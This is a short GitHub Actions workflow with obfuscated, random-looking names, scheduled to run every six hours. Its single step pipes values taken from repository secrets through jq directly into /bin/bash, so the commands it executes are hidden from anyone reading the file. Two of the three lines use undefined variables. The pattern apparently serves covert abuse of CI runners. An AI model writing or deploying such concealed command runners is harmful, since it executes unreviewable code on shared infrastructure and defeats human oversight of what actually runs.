name: corsetgoofy
on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: corsetgoofy
        env:
          int9652: ${{ secrets.int9652 }}
        run: |
          echo $int9652 | jq -r .jjcdp3 | /bin/bash
          echo $jt505 | jq -r .uwd6 | /bin/bash
          echo $d541 | jq -r .ejuup87 | /bin/bash

